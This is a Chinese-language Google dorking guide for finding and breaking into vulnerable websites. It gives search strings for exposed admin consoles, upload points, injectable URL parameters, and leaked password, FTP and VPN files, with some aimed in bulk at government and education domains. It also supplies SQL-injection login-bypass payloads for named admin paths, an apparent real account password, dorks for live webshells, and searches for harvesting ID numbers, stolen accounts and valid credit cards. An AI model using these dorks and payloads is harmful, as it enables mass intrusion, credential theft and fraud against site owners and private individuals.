0x01 google hacking 几个基础过滤器用途简介[说在前面的话,过滤器是死的人是活的,实际用的时候把脑洞放开,尽你所能拼装,才有可能达到超预期效果]:
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| intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle inurl: 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl intext: 从网页中搜索指定的关键字,经常会用它来穿透到漏洞页面……也可用allintext filetype: 搜索指定的文件后缀,例如:sql mdb txt bak backup ini zip rar doc xls…… site: 在某个特定的网站内中搜索指定的内容 link: 搜索和该链接有关联的链接,比如:友情链接 index of: 找目录遍历时也许会用到
0x02 google hacking所支持的一些通配符(建议选择性的用,因为越精确,也意味着能搜到的结果越少,这样容易漏掉一些有价值的目标,我们最终目的还是希望能尽快找到有漏洞的站先进去再说):
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| + 强制包含某个字符进行查询 - 查询的时候忽略某个字符 "" 查询的时候精确匹配双引号内的字符 . 匹配某单个字符进行查询 * 匹配任意字符进行查询 | 或者,多个选择,只要有一个关键字匹配上即可
0x03 找各种web入口,当然,这里所指的web入口并非仅限于各种常规网站后台[说到网站后台,一定要手工多尝试几个路径,实在猜不到,再用字典跑,节省时间]:
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| 如一些疑似目标内网的各种web管理系统入口,web端的数据库管理入口,某些设备的web端配置入口,以及一些常见的java控制台入口等等... 反正只要你觉得进去以后能上传脚本的地方全部都可以尝试,东西在你手里,可劲儿用就是了
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| intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat 直接这样搜结果肯定会非常多 intext:$CATALINA_HOME/webapps/ROOT/ inurl:8080/ 我们可以带指定端口号去搜,因为有些web并非在默认端口上,这样搜的话,可以尽量防止有漏网之鱼 intext:$CATALINA_HOME/webapps/ROOT/ intitle:Apache Tomcat/5.5.27 site:*.hk 针对特定版本特定国家去搜,比如爆出某个版本有远程执行类的漏洞就可以利用这种方式来批量进行 intext:$CATALINA_HOME/webapps/ROOT/ intitle:Apache Tomcat/7.0.32 site:*.gov.br intext:$CATALINA_HOME/webapps/ROOT/ intitle:Apache Tomcat/5.0.12 site:*.cn intext:$CATALINA_HOME/webapps/ROOT/ intitle:Apache Tomcat/6.0.24 site:*.com intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:*.edu.* intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:*.gov.* 搜特定类型的目标站点,如,学校一般都是edu,各种民间组织一般都是org,政府机构一般都是gov…… intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:*.org.* intext:$CATALINA_HOME/webapps/ROOT/ intitle:Apache Tomcat/7.0 site:*.org.* intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:*.jp intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:*.vn intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:*.ph intext:$CATALINA_HOME/webapps/ROOT/ intitle:Apache Tomcat site:*.uk intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:baidu.com 无意发现百度的某个子域,竟然是个博彩站 intext:$CATALINA_HOME/webapps/ROOT/ intitle:apache tomcat site:org.tw
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| inurl:/console/login/LoginForm.jsp 这样范围太大,可根据上面的示例随意变形 inurl:/console/login/LoginForm.jsp intitle:Oracle WebLogic Server inurl:/console/login/ intitle:"Oracle WebLogic Server 管理控制台"
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| inurl:/jmx-console/htmladaptor inurl:/jmx-console/htmladaptor site:*.edu.* inurl:/jmx-console/htmladaptor site:*.org.* inurl:/jmx-console/htmladaptor site:*.tw
| inurl:/ibm/console/logon.jsp
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| inurl:/phpMyAdmin/index.php inurl:/phpMyAdmin/index.php db+information_schema 指定命中数据 inurl:/phpMyAdmin/index.php intext:phpMyAdmin 2.7.0 直接针对特定版本号去搜索,更加精准 inurl:/phpMyAdmin/index.php site:*.tw inurl:/phpMyAdmin/index.php site:*.org inurl:/phpMyAdmin/index.php site:*.hk
| intitle:Login to Webmin intext:"login to the Webmin server on"
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| inurl:/wp-login.php site:*.hk index of /wp-content/uploads inurl:/wp-login.php inurl:/wp-content/themes/theagency 上传漏洞
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| inurl:/administrator/index.php inurl:index.php?option=com_advertisementboard 找注入 inurl:index.php?option=com_carocci inurl:index.php?option=com_product inurl:/administrator/index.php site:*.hk
| inurl:CHANGELOG.txt intext:drupal intext:"SA-CORE" -site:github.com -site:drupal.org
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| power by wordpress powered by discuz x3.2 powered by phpcms 2008 powered by drupal 7 powered by dedecmsv57_gbk powered by CubeCart 3.0.6 Powered by phpBB 2.0.6 powered by paBugs 2.0 Beta 3 inurl:wp-login.php inurl:/administrator/index.php inurl:/admina.php
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| owa: inurl:/owa/auth/logon.aspx inurl:/owa/auth/logon.aspx site:*.org.*
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| mirapoint(ShellShock): inurl:/cgi-bin/search.cgi site:*.org.* inurl:/cgi-bin/madmin.cgi
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| Zimbra(本地包含): inurl:7071/zimbraAdmin/ inurl:/help/en_US/standard/version.htm
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| Atmail(用于连接数据库的配置文件泄露): TurboMail(配置错误,进入任意邮箱): U-mail(注入&getshell): Lotus Domino Webmail(越权访问):
批量找常规网站后台[下面的php也可以换成asp,aspx,jsp 多次尝试,因为每个国家对后台的命名习惯各有特色,所以,这里只列举了一些相对命中率比较高的,找到后台以后,记得习惯性多尝试几个弱口令,万能密码未授权之类的东西]:
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| inurl:/manager/login.php site:*.jp inurl:/cms/login.php site:*.jp inurl:/manage/index.php site:*.jp inurl:/system/login.php site:*.jp inurl:/webadmin/login.php site:*.tw inurl:admin_login.php intitle:admin login inurl:admin_login.php intitle:admin page inurl:/admin/login.php site:*.tw inurl:/admin/index.php site:*.tw inurl:/system/adminlogin.asp site:*.tw inurl:/manage/login.aspx site:*.tw inurl:/sysadm/index.php site:*.com ……
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| inurl:/.svn/entries inurl:/.svn/entries site:*.org.* inurl:/.svn/entries site:*.gov.br inurl:/.svn/entries site:*.hk
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| intext:"Website Design & Developed By : WebSay" 默认后台/admin intext:"Powered by ENS Consultants" 默认后台/admin/login.php intext:"Desenvolvimento - MW Way" 默认后台/admin/index.php inurl:.php?id= intext:"Web realizada por Soma Estudio" inurl:/_mycps/login.php
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| intext:"design by weli" 默认后台: /adm/login.php 除了弱口令还有注入 username : linjizen@gmail.com password : lin719192
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| intext:" Powered by JADBM " JADBM Cms upload shell 注册后登陆上传即可 inurl:"/index.php/frontend/login/en" Estate cms upload shell 注册后登陆上传即可 inurl:/Content/Roxy_Fileman/ 该路径下直接就是上传点 index of:"filemanager/dialog.php" 该脚本就是上传脚本直接上传即可 intext:"Desenvolvido por Webnet Soluções Tecnológicas." fck上传 inurl:"subir_foto.php" 上传点 inrul:"/imce?dir=" intitle:"File Browser" inurl:"Powered by Vision Helpdesk 3.9.10 Stable" 注册后登陆进去编辑个人配置上传 index of /admin/fckeditor site:*.tw inurl:/ewebeditor/ site:*.tw inurl:/admin/upload_file.php inurl:/admin/upfile.php inurl:/admin/upload.asp
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| inurl:footer.inc.php?settings= inurl:/pb_inc/admincenter/index.php?page= inurl:/pnadmin/categories.inc.php?subpage= inurl:/index.php??view=src/sistema/vistas/ inurl:/edit.php?em=file&filename= inurl:/path_to_athena/athena.php?athena_dir= 远程包含 inurl:/path_to_qnews/q-news.php?id= 远程包含 inurl:/inc/backend_settings.php?cmd= inurl:login.action strus2系列执行漏洞利用 inurl:php?x= inurl:php?open= inurl:php?visualizar= inurl:php?pagina= inurl:php?inc= inurl:php?include_file= inurl:php?page= inurl:php?pg= inurl:php?show= inurl:php?cat= inurl:php?file= inurl:php?path_local= inurl:php?filnavn= inurl:php?HCL_path= inurl:php?doc= inurl:php?appdir= inurl:php?phpbb_root_dir= inurl:php?phpc_root_path= inurl:php?path_pre= inurl:php?nic= inurl:php?sec= inurl:php?content= inurl:php?link= inurl:php?filename= inurl:php?dir= inurl:php?document= inurl:index.php?view= inurl:*.php?locate= inurl:*.php?place= inurl:*.php?layout= inurl:*.php?go= inurl:*.php?catch= inurl:*.php?mode= inurl:*.php?name= inurl:*.php?loc= inurl:*.php?f= inurl:*.php?inf= inurl:*.php?pg= inurl:*.php?load= inurl:*.php?naam= allinurl:php?page= allinurl:php?file= inurl:php?x= inurl:admin.php?cal_dir= inurl:php?include= inurl:php?nav= inurl:*.php?sel= inurl:php?p= inurl:php?conf= inurl:php?prefix= inurl:theme.php?THEME_DIR= inurl:php?lvc_include_dir= inurl:php?basepath= inurl:php?pm_path= inurl:php?user_inc= inurl:php?cutepath= inurl:php?fil_config= inurl:php?libpach= inurl:php?pivot_path= inurl:php?rep= inurl:php?conteudo= inurl:php?root= inurl:php?configFile inurl:php?pageurl inurl:php?inter_url inurl:php?url= inurl:php?cmd= inurl:path.php?my= inurl:php?xlink= inurl:php?to= inurl:file.php?disp=
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| inurl:categorysearch.php?indus= intext:"樂天台東民宿網" inurl:news_board.php
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| inurl:".php?catid=" intext:"View cart" inurl:".php?catid=" intext:"Buy Now" inurl:".php?catid=" intext:"add to cart" inurl:".php?catid=" intext:"shopping" inurl:".php?catid=" intext:"boutique" inurl:".php?catid=" intext:"/store/" inurl:".php?catid=" intext:"/shop/" inurl:".php?catid=" intext:"Toys" inurl:details.php?BookID= inurl:shop.php?do=part&id=
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| inurl:article.php?ID= inurl:newsDetail.php?id= inurl:show.php?id= inurl:newsone.php?id= inurl:news.php?id= inurl:event.php?id= inurl:preview.php?id= inurl:pages.php?id= inurl:main.php?id= inurl:prod_detail.php?id= inurl:view.php?id= inurl:product.php?id= inurl:contact.php?Id= inurl:display_item.php?id= inurl:item.php?id= inurl:view_items.php?id= inurl:details.asp?id= inurl:profile.asp?id= inurl:content.asp?id= inurl:display_item.asp?id= inurl:view_detail.asp?ID= inurl:section.php?id= inurl:theme.php?id= inurl:produit.php?id= inurl:chappies.php?id= inurl:readnews.php?id= inurl:rub.php?idr= inurl:pop.php?id= inurl:person.php?id= inurl:read.php?id= inurl:reagir.php?num= inurl:staff_id= inurl:gallery.php?id= inurl:humor.php?id= inurl:spr.php?id= inurl:gery.php?id= inurl:profile_view.php?id= inurl:fellows.php?id= inurl:ray.php?id= inurl:productinfo.php?id= inurl:file.php?cont= inurl:include.php?chapter= inurl:principal.php?param= inurl:general.php?menue= inurl:php?pref= inurl:nota.php?chapter= inurl:php?str= inurl:php?corpo= inurl:press.php?*[*]*=
| intitle:注入常用的一些sql语句,比如:常用的union,substr(),select等等……
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| inurl:"wladmin/login.asp" Username : '=' 'or' Password : '=' 'or'
1 2 3
| intext:POWERED BY Versatile Software Services 默认后台/alogin.aspx User ==> 'or''=' Pass ==> 'or''='
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| inurl:/media.php?hal=login Email: '=''or'@gmail.com Pass: '=''or'
1 2 3
| intext:"Powered by : Best Webmasterz." 默认后台/admin User : '=' 'OR' Pass : '=' 'OR'
1 2 3
| intext:"Web Design and Maintenance by Cloud 5 Solutions" 默认后台/admin/login.php User : '=' 'OR' Pass : '=' 'OR'
1 2 3
| intext:"网站设计:火龙科技" 默认后台/maintain/login.php Username : '=' 'or' Password : '=' 'or'
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| intext:"Powered by Moodyworld" 默认后台/admin/ Username : '=' 'or' Password : '=' 'or'
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| site:*.tw inurl:/phpinfo.php filetype:log "PHP Parse error"| "PHP Warning" site:*.tw "id=" & intext:"Warning: mysql_fetch_array() site:*.jp "id=" & intext:"Warning: getimagesize() site:*.br "id=" & intext:"Warning: array_merge() site:*.tw "id=" & intext:"Warning: mysql_fetch_assoc() site:*.tw "id=" & intext:"Warning: mysql_result() site:*.jp "id=" & intext:"Warning: pg_exec() site:*.tw "id=" & intext:"Warning: require() inurl:/robots.txt site:*.*
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| 可能会遗留的密码文件: inurl:passlist.txt inurl:password.txt
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| 重要配置文件泄露: inurl:/application/configs/ 配置文件名为/application/configs/application.ini
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| htpasswd: htpasswd.bak filetype:htpasswd
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| vpn(cisco)[捅内网,非常有用]: filetype:pcf "GroupPwd"
1 2
| cisco在线密码解密网站: https://www.unix-ag.uni-kl.de/~massar/bin/cisco-decode
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| ftp 账号密码: "index of/" "ws_ftp.ini" "parent directory" "your password is" filetype:log filetype:ini inurl:"serv-u.ini" filetype:ini inurl:flashFXP.ini filetype:ini ServUDaemon filetype:ini wcx_ftp filetype:ini ws_ftp pwd ext:inc "pwd=" "UID=" auth_user_file.txt
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| 例如: http://www.cryptoman.com/ftp/ http://www.cryptoman.com/ftp/WS_FTP.ini
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| default password list 直接在谷歌中搜各类缺省用户名密码 admin account info" filetype:log
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| site:*.hk index of /admin site:*.hk index of /upfiles site:*.hk index of /fckeditor/editor/ site:*.tw index of /admin/uploadfile site:*.tw index of /admin/file site:*.tw index of /system/file site:*.tw index of /phpmyadmin site:*.tw index of /web/backup/ inurl:/phpmyadmin/index.php site:*.tw
| 绝大部分人在用别人东西的时候,基本是很少看里面代码的[即使开源],更不要说去除特征及后门,没办法现状如此,大家都很懒,既是如此,就不免要把自己的成果也被迫的共享给别人一份,所以养成良好的读代码习惯,是非常有必要的
| intitle:登录 - Adminer 这里只是随便举个例子,你可以自己平时多搜集一些境内外常用的脱裤脚本的标题,文件名什么的,慢慢尝试,root空密码也很正常
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| inurl:b374k.php filetype:php inurl:c99.php inurl:c100.php Generation time: inurl:itsecteam_shell.php intext:x2300 Locus7Shell v. 1.0a beta Modded by intext:c99shell inurl:c99.php powered by Captain Crunch Security Team "inurl:c99.php" + "intext:safe" intitle:r57shell intitle:c99shell +uname inurl:c99.php uid=0(root) intitle:c99shell+filetype:php intitle:ly0kha shell inurl:.php "cURL: ON MySQL: ON MSSQL: OFF" "Shell" filetypehp intext:"uname -a:" "EDT 2010" intitle:"intitle:r57shell" inurl:"c99.php" & intext:Encoder Tools Proc. inurl:"c100.php" & intext:Encoder Tools Proc. intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc.
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| owa入口: inurl:/owa/auth/logon intitle:outlook inurl:/owa/auth/logon intext:outlook vpn入口: inurl:/sslvpn site:hk
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| site:polyu.edu.hk inurl:asp?pid= site:polyu.edu.hk inurl:aspx?id= site:polyu.edu.hk inurl:php?id= site:polyu.edu.hk inurl:jsp?id= site:polyu.edu.hk inurl:do?id= site:polyu.edu.hk inurl:cgi?id=
找目标的数据库备份及其它各类敏感文件目录[后缀一般为 sql,mdb,txt……],像数据库和网站备份这种东西,还是建议直接用工具跑比较好,前提是字典务必要精心制作:
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| filetype:sql inurl:backup inurl:wp-content inurl:/eWebEditor/db/ site:*.com
关于google hacking的东西基本就到此为止了,最后再推荐一个不错的google dorks站点,方便大家练习:
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| https://cxsecurity.com/exploit/ 非常推荐 https://www.exploit-db.com/google-hacking-database/ 并不推荐,exp不错,但这方面比较废
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| do a barrel roll Askew zerg rush google sphere atari breakout 图片碰碰球 google gravity 碎片 google sky blink html 抖动
| 错误配置,敏感文件目录,各种信息泄露(源码泄露,重要配置文件泄露,密码泄露等),批量漏洞利用,最强大的社工库资源等等……你在web上所能利用到的一切,无死角尝试就可以了
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| 搜集个人身份证信息 filetype:xls 身份证 site:cn 搜集被盗QQ号什么的 搜集别人还在有效期的信用卡,不过千万不要干坏事儿哦,不然后果你懂的…… 另外,还有图片识别,位置识别,谷歌为我提供了很多很强大的功能,有必要的话可以去深入学习下如何使用谷歌的这些api